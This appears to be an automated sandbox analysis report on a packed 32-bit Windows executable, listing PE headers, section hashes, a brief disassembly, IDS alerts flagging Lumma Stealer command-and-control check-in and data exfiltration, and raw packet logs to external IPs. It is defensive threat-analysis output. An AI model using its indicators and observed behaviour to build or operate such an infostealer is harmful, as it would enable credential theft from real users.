                                                                                                                                                                      TLSH:FA663305A2560BB3F09EA27AB691F8157E7EEE70D47C10A58E1FDB03E03D2497159B32
                                                                                                                                                                      File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.............. ... y...@.. .......................@......m.l...@................................
                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                      Entrypoint:0xfe0000
                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                                      Time Stamp:0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:4
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                      Instruction
                                                                                                                                                                      jmp 00007FB8E4C8E43Ah
                                                                                                                                                                      invd
                                                                                                                                                                      insb
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add cl, ch
                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [ebx], al
                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], dh
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [edi], bl
                                                                                                                                                                      add byte ptr [eax+000000FEh], ah
                                                                                                                                                                      add byte ptr [edx], ah
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add cl, byte ptr [edx]
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7940550x69.idata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7920000x53c.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7941f80x8.idata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      0x20000x7900000x518a00f40d0e46f56f09d90e95d2faec48fcefunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x7920000x53c0x400c8357ab0351293312dce1378c948d5d7False0.6865234375data5.641060222469996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .idata 0x7940000x20000x200a0232179652c49de360269397bdb9ecaFalse0.150390625data1.0043697745670233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      0x7960000x2a20000x20066a3c3da0014c486f55e7b1602e6ce62unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      ycplgdyn0xa380000x1a60000x1a52001483d0871d408e276184964ab75f89b5False0.9944026649228258data7.952986238509369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      spankfnb0xbde0000x20000x400a5a1f34ec8d2fe043b46be4586ab72f7False0.767578125data5.988999381861949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .taggant0xbe00000x40000x2200852b51bfcd9cc11a65ff9c228db6069cFalse0.06089154411764706DOS executable (COM)0.7930240971223058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_VERSION0xbdcc580x244data0.4689655172413793
                                                                                                                                                                      RT_MANIFEST0xbdce9c0x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                      DLLImport
                                                                                                                                                                      kernel32.dlllstrcpy
                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-12-28T09:33:36.486952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:33:56.739542+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:33:56.739542+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:33:58.029226+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:33:58.800935+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449741172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:33:58.800935+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:00.455322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:02.816452+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:05.267953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:07.623320+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:08.468226+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449745172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:09.995549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:13.558667+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754172.67.128.184443TCP
                                                                                                                                                                      2024-12-28T09:34:14.403022+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449754172.67.128.184443TCP
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 28, 2024 09:33:14.661371946 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:14.661411047 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:14.661489964 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:14.664239883 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:14.664263964 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.463493109 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.464055061 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.464086056 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.465488911 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.465585947 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.470186949 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.470300913 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.509198904 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.509239912 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.628052950 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.842436075 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.842559099 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:16.842602015 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.843575954 CET49730443192.168.2.43.218.7.103
                                                                                                                                                                      Dec 28, 2024 09:33:16.843597889 CET443497303.218.7.103192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.583235979 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.702794075 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.702876091 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.703948021 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.823761940 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823776960 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823781967 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823786974 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823838949 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823878050 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.823909998 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823925972 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.823926926 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.823951006 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.823965073 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.824007034 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.824016094 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.824069977 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943052053 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943166971 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943384886 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943438053 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943526030 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943572998 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943593979 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943624973 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943634033 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943670988 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943681002 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943718910 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.943749905 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.943794966 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:28.985515118 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:28.985704899 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.105580091 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.105659962 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.149534941 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.149604082 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.265610933 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.353638887 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.353760004 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.593595982 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.593733072 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.680845976 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.681096077 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.681168079 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.713444948 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.713520050 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.800843954 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800857067 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800868034 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800878048 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800909996 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.800945997 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800956964 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800962925 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.800968885 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801007986 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801014900 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801055908 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801068068 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801074028 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801121950 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801162958 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801192045 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801208973 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801253080 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801290989 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801301956 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801357985 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.801407099 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801470995 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801534891 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801592112 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801661015 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801815987 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801863909 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.801956892 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802093029 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802236080 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802318096 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802350998 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.802359104 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802402020 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.802408934 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802453995 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.802505016 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802547932 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.802556992 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802596092 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802635908 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.802654982 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.802727938 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.802769899 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.833235025 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.833308935 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.877477884 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.877537012 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.920614958 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.920644045 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.920655966 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.920690060 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.920730114 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.920756102 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.920789957 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.920808077 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.920881987 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.920933962 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921034098 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921076059 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921138048 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921214104 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921278000 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921366930 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921422005 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921444893 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921539068 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921551943 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921616077 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921626091 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921721935 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921801090 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921937943 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921947956 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.921984911 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922002077 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922029018 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922075987 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922121048 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922166109 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922219992 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922230005 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922244072 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922262907 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922264099 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922296047 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922302961 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922314882 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922343016 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922349930 CET4973280192.168.2.4194.87.58.92
                                                                                                                                                                      Dec 28, 2024 09:33:29.922364950 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922429085 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922450066 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922499895 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922542095 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922636986 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922673941 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922719002 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922770023 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922811031 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922930956 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922940969 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.922971964 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923023939 CET8049732194.87.58.92192.168.2.4
                                                                                                                                                                      Dec 28, 2024 09:33:29.923037052 CET8049732194.87.58.92192.168.2.4
